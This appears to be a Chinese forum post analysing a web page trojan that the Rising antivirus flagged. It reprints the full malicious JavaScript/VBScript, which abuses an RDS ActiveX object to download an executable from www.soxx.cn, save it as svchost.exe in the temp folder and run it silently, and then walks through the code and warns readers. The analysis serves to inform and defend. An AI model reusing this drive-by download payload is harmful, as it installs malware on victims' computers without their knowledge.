昨日浏览网页
”哺“
瑞星提示网页木马
分析了一下是个JS文件(VBSCRIPT脚本文件)
源文件如下:
document.writeln(" <script language=\"VBScript\">");
document.writeln(" on error resume next");
document.writeln(" dl = \"http:\/\/www.soxx.cn\/Best001.vmp.exe\"");
document.writeln(" Set df = document.createElement(\"
object\")");
document.writeln(" df.setAttribute \"classid\", \"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\"");
document.writeln(" str=\"Microsoft.XMLHTTP\"");
document.writeln(" Set x = df.Create
Object(str,\"\")");
document.writeln(" a1=\"Ado\"");
document.writeln(" a2=\"db.\"");
document.writeln(" a3=\"Str\"");
document.writeln(" a4=\"eam\"");
document.writeln(" str1=a1&a2&a3&a4");
document.writeln(" str5=str1");
document.writeln(" set S = df.create
object(str5,\"\")");
document.writeln(" S.type = 1");
document.writeln(" str6=\"GET\"");
document.writeln(" x.Open str6, dl, False");
document.writeln(" x.Send");
document.writeln(" fname1=\"svchost.exe\"");
document.writeln(" set F = df.create
object(\"Scripting.FileSystem
Object\",\"\")");
document.writeln(" set tmp = F.GetSpecialFolder(2)");
document.writeln(" S.open");
document.writeln(" fname1= F.BuildPath(tmp,fname1)");
document.writeln(" ");
document.writeln(" S.write x.responseBody");
document.writeln(" S.savetofile fname1,2");
document.writeln(" S.close");
document.writeln(" set Q = df.create
object(\"Shell.Application\",\"\")");
document.writeln(" Q.ShellExecute fname1,\"\",\"\",\"open\",0");
document.writeln(" <\/script>")
在这里我解释一下,
on error resume next容错
定义DL=http:\\www.soxx.cn\\Best001.vmp.exe
Set df = document.createElement(\"
object\")"); 用createElement创建对像
总之是下载木马Best001.vmp.exe 用FSO对象重命名为SVCHOST.exe 然后运行这个文件
代码瑞星已经可以杀了
感兴趣的是这个Best001.vmp.exe
www.soxx.cn我看了没什么问题,可能是让别人入侵了吧。
AD.JS是某ASP统计程序的文件 也可能让黑客给改了
这个BEST可能是个蠕虫
到处见他的身影
瑞星目前查不出来
大家要小心
